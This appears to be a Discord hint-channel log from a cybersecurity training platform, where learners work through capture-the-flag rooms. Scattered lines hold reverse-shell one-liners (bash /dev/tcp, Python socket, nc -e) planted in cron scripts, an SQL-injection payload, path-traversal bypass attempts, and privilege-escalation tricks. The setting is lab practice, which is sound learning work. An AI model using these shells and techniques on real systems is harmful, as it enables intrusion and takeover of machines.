#room-hints
1 messages Β· Page 80 of 1
It was until I backgrounded it then it backgrounded the whole console instead of the session as I understand it
Wow I am stupid.
I can try
But it should let you background smh
Yeah, it was a meterpreter, then you spawned a shell and it won't let you out
omg yes, exit worked
Thank you!
C:\Windows\system32>exit
exit
meterpreter >
there must be something wrong with my installation of Metasploit. Thanks both π
I did nothing, I do not deserve any credit
listening and talking it through always helps regardless π
Haha, yes it does. I am going to go update all my notes although.
@manic citrus Thanks again π got dalia's flag.
is there anyway to connect to linux agency priv esc users without startting again from scratch
because I did like 4-5 escalations
and then took a break
and I'd hate to do it all again
@obtuse birch Please do not post in multiple chats, that is spamming.
Nope
On the missionXX you can ssh back in as the initial user and then do "su - missionXX" with the last flag you got as the password
Penlope is the first direct ssh but you can su - straight to back to viktor
notes as in, my methodology and the payloads?
Yes
Get into the habit of copy-pasting and screenshotting everything
(is apparently essential for oscp)
is it, wow, didn't know that. Thanks
Well if it's not documented, it didn't happen
touche
At least that's from what people who have done the oscp have said
are you planning on giving it?
Getting it assuming I can get work to let me take it
Might have to change jobs for that though :(
that always a bi... big trouble
any hint on linux agency root.txt
Escape the great blue whale
yeah i am trying it can't figure it out
Linpeas should spot it
And give a link to how to do it
Plus they made it easy to abuse
Look around for anything unusual
docker.sock??
That certainly should not be in a container
There's one more piece to the puzzle, good hunting
Naw that's a hint that you're in a container thougg
back again to get LA done π
any hints on how to find the elastic volume in linuxagency?
damn, got LA all done
penultimate flag was easier than I expected... needed a hint on it though
docker escape?
||went too deep down the Docker route which wasn't needed until final flag||
Elastic volume?
I genuinely feel like Linux Agency is a room which deserves a badge reward
I don't know...that room annoyed me a lot...
i agree
Some bits were a bit repetitive in the first part
sure
the second part is fun
@ripe hedge yes task3 flag 12
The privesc vectors were fine, could have removed a couple of the gtfobins
Felt like there was a bit too much filler imo
good for beginner imo
Anyone Completed Linux Agency..
I'm stuck at mission 17 flag...
The hint is "SOS! Somebody kidnapped the elves of santa"
Pls give any hint
Thank you
I'm stuck at mission 11 flag...
The hint is "Your need to finD some way to reverse a binary tree."
Pls give any hint
i am just beginner
Stuck at silvio's flag, i found a way to execute privesc using zip binary but its not working. Any help?
I copy-pasted and it worked...
Make sure your running it with that user
I'm sorry but how?
Sudo -u usually
Yup
@ripe hedge how can i decode basically it is a directory
haha ,complete the Linux Agency, feel fun.....
Maybe your not doing the privesc correctly
hint fin ""D"" look in the man page of find
im stuck at flag25 dont understand the hint
the binary checks a condition, find it
Hi any hints for penelope's flag in Linux Agency room ? ||Is it some base64 encoded file somewhere in /var ?||
still i am stuck
Try ||grepping recursively ||
thnaks for help @digital bolt @ripe hedge @pure thistle
Did you get Penelope's password?
it's near sean's
Nopes
OK, you need to go back to where you got Sean's and look.
how can i escalate to root in "injection" pls?
What have you tried?
Iβm guessing you are on the last task right? βGet the flag!β
sudo -l ,SUID and crontab
yup true
Get a reverse shell & netcat running. Go from there
Hint says βThere's no user to privesc to so where could the flag be...β
Find
@winged mist i found it, but isn't that considered cheating
like you are looking for a file called flag just cuz you know it's there
in a real world scenario we won't know if there's a file called flag
do you understand what i mean?
what if the file was called anything else flag
we would never find it
what i mean is using find command to search for flags is not fair
what if we didn't know the name and we need it how are we supposed to find it?
You should know what exactly you are looking for before starting
bit it always called either flag.txt or user/root.txt so it would be easy using this method
i can do (grep -R "THM{") for half of the rooms and it'll work
Not exactly kek. Irl is somewhat different from ctfs
anyone on linux agency ?
where are you stuck?
Bet a bunch. But I havenβt finished it yet
So I might not be able to help sorry
Better just ask
& have patience
@winged mist thx for the help
You could ask this in #general & get more insight
No p
Task 13 says what option you should use when the host doesn't reply ping.
I have completed it
I don't get ping reply....
And if you think nmap says "Host is up" == "exists ping reply", it's wrong. Nmap's host discovery does not only ping(ICMP ECHO_REQUEST), but does more things.
Im doing linux agency trying to get dalia's flag. I dont know what im doing wrong:
- ||Crontab says Dalia executes /opt/scripts/47.sh||
- ||I edit the script to do reverse shell using
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'|| - ||The revshell does not execute and cronjob overrites the script again||
Ye I eventually figured it out, I was using wrong flag. I am a dummy
Thanks got it
|| bash -c ' bash -i &> /dev/tcp/$RHOST/$RPORT 0>&1'||
Bro I was stupid, it was so silly and easy answer, I found the flag instantly when I opened my laptop today.
Apparently there is nothing you can do when the brain freeze...
Anyway thanks for the help. π
it worked, thanks! π
Breaks are important ;)
π
Having some trouble with Printer Hacking
How would I connect to a printer with a non-default port?
Don't know if I'm doing anything wrong or what
I'm in the linux fundamentals 3 room on task 7 - I've found the binary - the test directory and file already seemed to be in my home directory but whenever I run the binary it just prints out test1234 which isn't the correct answer it would seem
ugggg having trouble with escaping a docker container
Anyone give me a little hint on getting started with keldagrim... I'm completely stumped
No hints for 72 hours after release
It hasn't been 72 hours yet, please wait 72 hours after release before asking for help/hints on rooms
Which room?
wondering if someone can help me please on the Linux fundamentals 2 task 11 This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable.
then it asks for shiba3 password
Cancel found out thanks.
Working on the room "John". Openwall's site is down, which has the answer to task 8 Q2. "What rule would we use to add all capital letters to the end of the word?" Can anyone help me with the syntax?
Openwall seems up
shoot. must be my firewall blocking it then. Thanks!
linux Agency
linpeas might help
hummm ok i don't understand how will linpeas help with the commands to break out of a docker container?
yeah sorry that makes no sense to me
Finally after like 8hrs finished LinuxAgency root.txt was brutal
can anyone help me with mission16 flag, i found the file but i cant figure out what type of encoding it is
linuxagency
i found out, but can anyone help me understand how to identify hashes by seeing them ? or is there a tool or something online( i try to use burp or crackstation)
Hashid
gotcha
thank you for this one, i prefer using online crackers over stuff i need to install.
any hint on Madeye's Castle user1.txt
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
Gotta wait 72 hours π
i cant understand the hint on mission24 "send the money to another country" ?
Don't pay too much attention to the clues, just enumerate like you are doing a priv esc
coolio
Hello!
Do you have any idea how to transfer files faster from my computer to the attack machine? (I mean, the files that I downloaded from the website)
I'm using a http server for the moment, but it's a bit tricky and I'm searching for a better solution.
Thank you!
Doing the linux fundamentals 3 room - the binary is meant to look if there is a file in the home/test directory which there is but every time I run the binary it prints out test1234 and this isn't the flag π€
What should I put on the owner? https://cdn.voidchan.gg/u/vCD5sPr.png
You have nmot run the binary in that screenshot.
Not only that but I do not see the binary in that screenshot.
Sorry was in a separate directory - marked as spoiler as finding it is part of the task
nvm I misunderstood the question π
You're entering the flag wrong @white salmon
Does the binary need to be in the same directory? π©
I just misunderstood the question
It's fine now
Sorry meant to reply to @trim haven there
Oh
can I get a sanity check for the bruteforcing part of Madeye's castle, or is it too early?
too early, only just released I believe
only released yesterday
another ~48 hours to go
Yeah, I think I have a few ideas, but all of them involve bruteforcing which I really don't want to resort to
also, they spelt Hermione's name wrong and I don't know if it was a continued error, or just a typo - which kinda screws with my whole bruteforcing thing
u got it ?
cuz i think i got something
anyone onto keldagrim?
@true orchid scp can transfer files between computers
don't think we're allowed to give hints on keldagrim either as it's pretty recent
got anything?
check hosts
have you found login page?
yes
have you found notes?
alright
not really in regards to that previous comment
alright
Best hint I can give is not to get too distracted by the hint! There's something else you can look at to see what the folder owner has been up to.
just rooted keldagrim, really nice machine, kudos to @dusky vigil
ayy nice, good job
naw not yet
can i dm
Do scp
I get nulls ><
Just rooted Madeyes Castle. It was very pleasant journey to root π
@astral raptor yep
@astral raptor I can't no hints for 72 hours
π
Try Harder π
Yeah buddy
I tried some and got result
Maybe luc***** has to do something with something but i don't know what is that something π
Please stop spoiling the box.
may be we don't have write access here
have you tried doing as the line that says: consider using PASV?
it can also be name or folder constraints, you may have write but not on that particular folder
instead of you saying "send me data on this port" (active) it waits for the server to say "you can send data on this port" (passive)
if I understood correctly
it's who initiates the transfer
PASV mode is generally used to bypass firewalls
^ yup that is correct, apologies for the delayed response, i was in a meeting 
Who have done Madeye's Castle? I need help
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
@white salmon not yet
Okay
hello is there any admin for Madeye's Castle
Why do you need an admin?
Please do not ping the administrators.
ok sorry
Also no hints for that box for at least 2 more days
could I get a hint on linux agency -> mission12? I got no clue what the hint's talking about, and I didn't seem to find anything useful
nvm, got it
hey guys can anyone help me with madeye's castle box?
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
sorry didnt know the box is so recent
has anyone encountered problems while ||decrypting the .pgp file|| on tomghost? I keep getting the ||gpg: decryption failed: secret key not available|| error
Did you import the secret key?
I have not, but I already cracked the other file. I'll research on that then thanks
ahhhh that's what I was supposed to do. got root, thanks again
im on internal room,i have admin access on wordpress,but i cant install any plugins because of file writable rules 'An unexpected error occurred. Something may be wrong with WordPress.org or this serverβs configuration. If you continue to have problems, please try the support forums.' how can i upload my reverse shell? hint plz
maybe you can change a existing template and run it? for an example the 404 file.
yes,got it 1min ago,ty
guys i'm doing the "chill hack" room and i'm in as the user apaar
i'm trying to escalate to root but idk how
i tried crontab, SUID and sudo -l nothing helps
how can i do that?
u got to steghide 1 picture
Hi Guys, I would really appreciate an hint on Linux Agency. I am at the final steps, looking for user.txt. I actually have no clues. Tried to run Linpeas but I can't get anything useful from it. Many thanks
Check hint with ur programmer mindπ
You should exploit ||sudo vulnerability||
Thank you guys, I'll work on that

Hi. I am stuck on the Nmap room (tryhackme.com/room/furthernmap) task 3 (Switches) question "How would you tell nmap to scan all port?". Can anyone give me a hint to the question? I looked through nmap -h but can't find anything useful, I used grep but still can't find anything useful.
thank you. I appreciate it.
@leaden walrus use manual for nmap u have there much more information than on nmap -h
command: man nmap
Concerning the OWASP-Juice-shop room in the beginner's learning path. I'm at task 4 where I'm using burp suite to brute force the admin's password and it has taken over 3 hours and hasn't finished yet. Is this normal? Or am I doing something wrong?
Something's gone wrong. You'll have to give us a clue though.
I mean also burp intruder is slow without burp pro
hydra is much faster
Should intercept be on or off or that doesn't matter? I've been doing it with intercept off because I've had to keep extending the time
True
Try zap
but keldagrim was annouced on 29th of january
it was 4 days ago
72/24 = 3 days
@stuck fractal
Ok
No, you can't

-_-
Hi everyone i am currently in the burp suit room at task 10. I have already found a response with a set-cookie header and send it to the sequencer when i run the sequencer i just accumulate requests but no tokens. What am i doing wrong. Ps: i also waited longer ~ 1 million requests
any hints for Keldagrim?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
is that message pinned, @trim haven it should be otherwise
true
So I copy and paste
I'm sorry π¦
Not your fault π€·ββοΈ
Rule 13 perfectly states that if they need help and do not specify it correctly, they can be denied help
yeah but I'm still sorry you have to keep copy-pasting
Please include the room, task, and question number in your question if possible.
Oh, it's no bother.
Easy guys I am new kind in the block π Didn`t see pinned messages , will check now..
Should i post that in room-help ?
I didn`t use thm discord a lot, always try more and more until a got root access..but with keldagrim i stuck with foothold, tried nmap, gobuster, nikto, web site source code searching...but no clue at all for me..did not try with msf yet..
nmap should give a hint
let me check my notes
yeah nmap should be able to tell you what kind of server this is
gobuster should be able to find some juicy things as well
or in this case the page source
the rest is mostly looking around
which wordlist did you use for gobuster? only found admin page
will follow that hints
admin page sounds interesting, no?
at the first check didn't see anything interesting will check once more :)
there are two ways to get interesting things
but I'd google the type of server if you aren't familiar with it
guys any hints on how can i escalate to root in "start up"?
linpeas
it doesn't help
the escalate has something with file permission and where can i write to
uh right, you wanna pm so you don't spoil anything?
Then check the file and see what it does
can i pm u?
sure
you know using grep with a tag can do pretty much every challenge in linuxagency
did some challenges with that, and 100% sure that was not the intended way
regex :)
read the walkthrough, he has used kinda same thing. But still 100% sure that is not the intended way
there are often unintentional methods in a room, the linuxagency is focused on sharpening your skills with the linux cli
i want to learn that intended purpose
1st look for locksmith blogs on getting into cars. It's something you'd put into the gap by the door & inflate so as not to damage anything. 2nd it's in the 1st video. If you didn't catch the term, it's on Deviant's web page. The last is a bit weird. It's not really the name of a thing, more the activity. Like something that blocks is blocking. In this case the word before-ing is something you might use to protect yourself if you wear armour or are Captain America.
@candid nimbus in English, it's also a thing, but it's a strange grammatical quirk
you'd use it to protect cables from interference as well
I know. I've spoken it for 50 years and have an MA in it. I'm just helping the bod to the answer without getting excited about gerunds.
hi there
ahm a smiple question if you dont mind
as i know answer suppos to be something like
--bypass firewall
--Stealth Scan
seems they are not correct , any body can help with that?
The first one is correct but needs to be worded differently
oh....okay thanks now i have a clue about it
it should be in the task, word for word
hello, i am doing the Bounty Hacker room. .com/room/cowboyhacker
if i use "locate user.txt" it works but it does not work with "locate root.txt"
also when i use "grep "THM" *.txt" it only shows me the user.txt
does someone know why cant find the root.txt?
Are you root?
Then you can't list /root usually
you don't have execute/list rights on the directory
damn, nvm. thx guys π
Could anyone pm for a nudge on 'Relevant'?
sure
guys can i have a hint for wgel ctf
im really stuck
im in as jessie but i can't escalate to root although i can run wget as sudo
but i don't know how to take advantage of that
i thought of downloading the shadow file and cracking the hashes but the passwords are not in the rockyou list
on linux agency, final task, need some assistence finding sean's flag. i know im in ||adm|| group but i have tried to grep recursivley in ||/var/log|| but couldnt find anything. any help? thanks
Your in the right direction it is in || /var/log ||
@sonic wigeon is it within one of the directories within ||/var/log|| i've parsed through what seems like every log file and cant seem to find anything that has to do with sean. some files are also huge which dosen't help
Are you looking for the flag recursively in the right format for sean ?
Np
hey i need a kick in the right direction for a linux privesc, so i found a script which is executed by a non root user as a cronjob, which i have the write permission to. i cant think of anything other than putting something like this "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
this is the first time im coming across a privesc like this!
You can simply put /bin/bash to get a shell
No hints or helps are allowed for new rooms till 72 hours passes.
Morning everyone. I did Ra2 and Set. Apparently, Osiris seems the hardest one. Any nudge on Ducky payload via TFTP. I tried to submit simple .bin payload to ping me back but to no avail. Definitely, I do something wrongly. Can anyone DM me with some nudges to put me on the right track, please?
can you use wget to put a file where you shouldnt? ie. instead of reading a file writing a file
yes
i tried to download the /etc/sudoers and then edit it on my machine so i can run more commands as root but when i replace it with the original /etc/sudoers everything breaks and i can't see the output of sudo -l
with wget remember -o != -O
i also tried to downlad /etc/passwd so i can edit it and put a user there with a uid 0
but when i type su (user) it also breaks
i used -O
shadow?
.ssh
i think -x -nH
I have a config file which consists of list of URIs I want to download. For example,
http://xyz.abc.com/Dir1/Dir3/sds.exe
http://xyz.abc.com/Dir2/Dir4/jhjs.exe
http://xyz.abc.com/Dir1/itr.ex...
New room I think?
yup
Hey guys,
I'm trying to do this room : https://tryhackme.com/room/brainstorm
I'm stuck on lauching the exe inside a windows 7 32 bit M (wiht immunity debugger installed), for those who have done this, what was your install ?
thanks for your help
This program cannot be run in DOS mode, I tried to search online but can't get what I'm doing wrong (tried with windows 10, windows 7)
Yes
okay thanx
Can anyone help me in madeyeβs castle
K
Hi anyone working on NIC -Linux Part 1? I stuck for long this one. the shiba3 password and shiba4 password..... any guide of hint would be appricated
Check the linux rooms
I forgot that the linux rooms were updated so that content needs to be refreshed in regards to the room pointer
Ok i got it done. i did not know it has nothing to do with the ROOM for that two questions
thanks for the room. Great one
It's alright haha, it used to be 1 single box rather than 3 separate ones and thank you for your feedback β€οΈ
it should be in the users folder, you could also check for the file name
How could we insert a new value called toyota to replace tesla?
i know how to do it, but not getting the answer right
could someone help
may i dm you @tulip mural
Sure π
You need to change the 'syntax' without changing the "semantics"π
i was doing linux agency when i reached mission 9 i got rockyou.txt in the directory of mission9 i tried locating flag.txt its there but when i tried opening it outputs permission denied
Just try to grep mission10
what can you eplain a lil bit more please
Use cat command by piping grep command
can you give a eample
example
Anyone playing archangle ctf?
my brain is dead and cant think what to do
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
@white salmon @tranquil ivy ^
Thanks James.
As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
alright thanks
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
alright, sorry for asking but i have only now checked that it was released today
i usually open the machines in the new rooms section without looking up at the annoncments page, i'll keep that in mind for the future releases
thanks for let me know that
eh?
got a question about the nmap room.
the last question says "deploy the ftp-anon script against the box"
unfortunately no matter how many times i run the script [nmap -vv --script ftp-anon -p 21 <ip address>]
i keep getting a response saying the Host seems down, if it is really up, but blocking our ping probes, try -Pn
am i doing something wrong?
can someone point me in the right direction?
is the task bugged?
Oh!
nvm
finally started working
looks like something was wrong with the room
Guys any hints on Keldagrim room ?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Im basically stuck in the exploitation phase
so Im in the network services room, i've done everything right so far with the exception of.... I have no idea how to read a txt file in samba. Everything I try turns up nothing, either i get an object name not found or a failed to open message
It has spaces in the file name
Try quote marks or escaping the spaces
didnt work
underscores are their own character
kk
They're not spaces
hmmm, now i get a response that says for read/write fnum 4
Just use get.
is there a manual i can read or shoulod have read before tackling this?
it works just like the command line ftp client
omg, ty! i didnt think i'd actually have to download the file
Madeye Castle
Need a little hint on linux agency, managed to get || robert's passphrase || but im unsure what to do now, doesn't seem to be an account
Check for listening ports
I have a problem in attacking kerberos room, in task 2, enumeration w/ kerbrute, I added CONTROLLER.local to my /etc/hosts file, then I execute the command ./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt but it isnt finding nothing, Ideas?
nvm I forgot to get raw input from Users.txt when I wget the list
Enumerating Telnet in the Network Service room - can anyone share how you'd know that Telnet is the service being used? It doesn't indicate it in the scan from what I can tell
from what I can remember its a backdoor you just use telnet to connect to this backdoor
or something like that not sure
Check what services are running on the machine
Not all services are exposed to the outside world. Look at the type of credentials you got, surely they'll be useful somewhere
hey , I am doing advent of cyber 1 Day 23 is related to sql injection and for that I used sqlmap , this is the payload of sqlmap , ||log_email=gyQB' AND (SELECT 2288 FROM (SELECT(SLEEP(5)))YfXe) AND 'qvoO'='qvoO|| but when I tried injecting it through the login page , I was still getting the error related to some email check , why ?
hello ,how bypass strpos($path,'../..')?
%2e%e%2f%2e%2e is not work
%252e%252e%252f%252e%252e is not work too
!rule 13
no help for new rooms yet
!rule 13
@chilly wigeon I'm also struggling with that, we will have to wait until saturday evening for hints
haha .i will go ,bypass it~!~!~!~!
I hate you @chilly wigeon π
I'm sure you can progress fine on your own before then!
archangel, more rickrolling than flags π . fun box
yeah a few hidden gems
I already gave up, I tried literary dozens of things to bypass the lfi filter, I probably missing something obvious/simple/stupid , maybe tomorrow with a clean mindset...
bypass is actually very simple. For me the next step is much more annoying (it is so simple, yet I cant seem to find the right file)
Amazing how many problems get solved away from the screen! π
Hello everyone, I am doing Archangel, I don't know how to view the code. You can help me. Thank you.
U need to wait 72hrs after release for hints. This will be on Saturday as the room was released yesterday.
okay
same I view the code but that doesn't help me much haha
Yeah understood already! I just like to discuss woes and not feel alone π - I'd already kinda discovered stuff through trial and error so for me it wasn't as helpful
shhhh π
ok i got it now, time away really does help π
any hint on madeye's castle user1.txt
is Madeye's open?
wdym
are we allows to give hints
yeah i guess
in any case, tell us where you're at, and what you've tried
got the spellnames.txt try to login in the .thm site
hello i am on linux agency mission12 i got in the mission11 dir got some dir named share > nano found nothing in those i want the flag of misson 12 hint says its tome to study EVS i dont what that is
EVs (Environment Variables)
yeah the hint is a bit misleading
Let me change the hint.
there's no brute force involved on the login page
ok
(you'll need to hang on to that list though)
The hint now says EVs.
not my place to say, but maybe check with the room creators?
thanks sir
i would be glad if you can tell me where to study those i didn't found any great site by goggling
2:58 PM] timtaylor: EVs (Environment Variables)
got the flag thanks fot your help
haha yes
i was styding but just for curiosity whats the diffrence between EVs and normal variables
what do you mean by normal variables
they are sertup to store arbitary information
for convienience
I mean in what sense
variable in linux
environment variables are just variables in the environment you're in as the name π
like with bash, if you do VAR = value then you're basically setting up an environment variable
its same as normal variable
there are some that are set by system that will be in every environment like $PATH
pretty much
there's a way to set some permanently but can't remember what file it is.
ohh so they are already set up by system thanks
Also research the difference between global and non-global. π₯³
sure
I was solving linux agency room... N I got stuck in escaping the docker container... π It isn't mounting
look around the web for different methods I don't think I had to mount anything
Srsly?? There is another way to esc it?
unless I am completely wrong and being smooth brain
I literally got the whole way all without hints... Now stuck here for hoursπ
Hmm well can u be a little more specific what u tried?
Can I dm u?? I don't wanna spoil the challenge for others
let me check if i noted it down or not
I was following a blog... And then tried using the
mount /dev/sda1 /mnt/root
Has anyone completed Archangel? I have been stuck on the Flag2 part for hours now. Have tried a ton but can only ever get the normal text from the page output or "Sorry, thats not allowed"
No hints allowed yet on that room.
Alrighty. Thanks. Will go back and start from square one. I have to be missing something easy.
What am i doing wrong?
still in the netwrok services room, attempting telnet exploitation. why can't i generate the payload using msfvenom?
is there a fault with the command i'm using?
your command looks alright, is that ip that you assigned to lhost, your machine's ip or the box's?
I wrote exactly the same command, and it worked
thats the IP of the attack box
shits happens
damn, what a diff swapping numbers makes
ty for pointing that out
woulda prob been another 30 mins before i noticed it
72h has not passed yet. So no hints yet
Oh I see...
Do not post spoilers, especially when 72 hrs hasn't passed since release.
Oops, my bad man, didn't know about this rule, good to know!
Sorry about that
Can anyone give a nudge on Linux Agency mission25 flag....
i got the binary check all the files in the mission24 directory......am i suppose to do some reverse engineering on that binary
the binary is a rabbit hole, try looking elsewhere in the folder
@prisma gull and @glacial gust For Agency Mission 24, I'm pretty sure the ||binary|| is not a rabbit hole. I had to use it to solve...
so i have to do some reverse engineering on that binary
Yes. I did.
Do not provide or ask for help or hints for Archangel room until 6th Feb, 7pm (GMT)
@glacial gust I checked all the other files in that directory but nothing showed up
if you look at the hint, it references money transfers, if you do some word play with a money transfer app and a file in the directory you should be able to locate the flag
can I DM you
Feel free to DM me, if you'd like as well.
On the Nmap room (https://tryhackme.com/room/furthernmap) in the practical elements - my scans are taking ages - like 15 mins - I've had to add the -Pn option as it was saying all the ports were closed otherwise - just not sure if I have missed something
An online platform for learning and teaching cyber security, all through your browser.
well done.. archangel...
Can I get a hint for the nmap room
question: ||
How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)||
current answer:
||nmap -sn 172.16.x.x/16||
x is used as a placeholder in the question
It's a common placeholder generally
But 172.16.x.x implies a /16
As does the netmask
so that part is fine π
hello i am on linux agency mission25 i cant use ls -l mission25@linuxagency:~$ ls -l
output bash: ls: No such file or directory
can i get a hint
@distant tartan see path
the output says that ls do not exists.. it is this possible?
Variable
no
echo $PATH@distant tartan
yes
thanks bro
if not worked try this
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Close the shell and open a new one maybe?
/bin was enough
Restoring path is the only way ig
it worked

actually restoring path was only the task
guys i'm doing the linux agency room
i did it before and i reached to the user reza and now i'm trying to do it again
but the thing is i'm in as the user viktor and i know in oreder to escalate to dalia i need to give my self a shell using the 47.sh file
i tried
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -e /bin/sh 10.0.0.1 1234
but none worked
before the bash one worked with me
what's wrong now?
Room: network services
Task 10: Exploiting FTP
Using hydra to generate possible passwords, I see it puts forward 14 million possibilities. Am I seriously expected to sit here while it tries all of these? does it actually try them and return a value when one works or am i suppose to be doing something else?
@opal vine is that your correct IP?
it actually does
you can try the -V for verbose
yup im pretty sure
10.0.0.1 is not your tun0 ip
you dont need to wait for all the passwords to be tested, the file has 14 million entries, but the password will probably be in the first few thousands
I did, its showing me a ton of results but so far the end of the line for all of them says 0/0
For THM, brute force should take no longer than 5 minutes
omg! first few thousand?! lol
You'll have to modify them
its only on 800+
its diff ip
try to use your ip (tun0)
yes right
Should work
it's not
i know that there's an interval where the root re-set everything
if didnt then try it again cuz it changes after 30 sec
but i did it 45645 times
what is your listener command ?
You have 30 seconds to set the file, 30 seconds after its run, it will be reset
they way you wrote that rev shell the listener command should be nc -lnvp 8080
I used watch to see when the reset occurred
ok this worked, i think it was a typo idk
thanks for the help @ripe hedge @kind bear
anytime 
Good hunting
trying to complete the nmap room. stuck on this question
Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?
Currently using this command and getting this repsonse
||``$ sudo nmap -sX -p1-999 10.10.84.131
Starting Nmap 7.60 ( https://nmap.org ) at 2021-02-04 15:02 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.12 seconds''||
When I run -Pn to check I get told otherwise though
||''$ nmap -Pn 10.10.84.131
Starting Nmap 7.60 ( https://nmap.org ) at 2021-02-04 15:00 EST
Nmap scan report for 10.10.84.131
Host is up (0.16s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 10.35 seconds''||
the xmas and port range correct?
You want an xmas scan. That skips the ping. And scans the specific port range.
All three flags.
Would that cause the host to show as down?
Would what?
the missing flag. when I try to xmas scan i'm told the host is down. when i use -Pn i'm toild the host is online. i'll try to go back over the coursework
Just ask your question
Linuxacademy
You mean linux agency?
So flag 25 ||you're not able to cat anything, right?||
No
There is only .viminfo file to cat
And bride file is asking for money but where to insert
I tried vim bribe
Asking for a command in it
@astral smelt any lead..?
Ah sorry thought you was on the next one try the ||export command||
So did you cat the .viminfo file?
It's not that big. If I'm remembering right it might be worth a browse
@simple mountain Hey guy, can you give me a hint on this question? I keep typing FTP as the service but telling me it's incorrect ?
Where are we at?
not seeing your port numbers on that
The answer to that question is giving three asterisks, so i'm assuming it's FTP but that seems to not be the correct answer
How did you discover this?
sory
Dammit deja lol
So bottom line, this took creative thinking
for the answer
Ok... roki - run it anyway.
Thanks you guys lol
Yeah. So 1 qeustion was 'How many services on ports under 1000'. And the next question asked for the higher port.. and you made an assumption π
Guys any hints on Keldagrim room ?
has anyone finished with Intro to x86-64 room? I'm stuck on CRACKME1 don't know exactly how to do it
NEW
any
Is anyone else having issues with the sysinternals room not loading the live packages ?
guys i'm doing linux agency , i reached to the user sean
but i can't find his flag , like is this normal?
ya, ask a question you want a hint on
Just be patient and wait?
wait for what
Someone who's completed the room and wants to give you a hint
oh ok
@opal vine what user are on currently loged in as?
If you are currently sean, grep and certain logs are your friends
π
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
hello i am doing linux agence how to extract a flag from flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
This is the room hints channel. @tulip bronze
fair
Maybe determine the actual file type.
how to do that can i found it on googgle
sure
Practically all information can be found on google
file etc is it this just making sure
Try it and find out
Research the command if you don't think it is right
No reason to ask me when you could find out faster yourself and learn something in the process
ok
lol at least 1 rickroll(s) in archangel
@novel sparrow Let's just not
ok
file -i file name worked gave me file type as g-zip and charset as binary
yes now i have to dcompress it thanks for the hint
thanks i got the flag
hi, can someone help me understand this syntax? "-perm -perm -u=s"
i know it selects the SUID bit, but i dont quite undersrand the -u= part
are you talking about the find command?
aye
also is this a room specific task or more 'infosec general' (just to make sure correct discussion right place etc)
well, i'm working on the find room
and im just looking to undertand the syntax a little more clearly
well there is a section in the manual on find with permissions and it talks about symbolic user id representation in some examples
'man find' should bring it up
yeah, i've read through the majority
perhaps i'm a little dense, but it seems amiguous
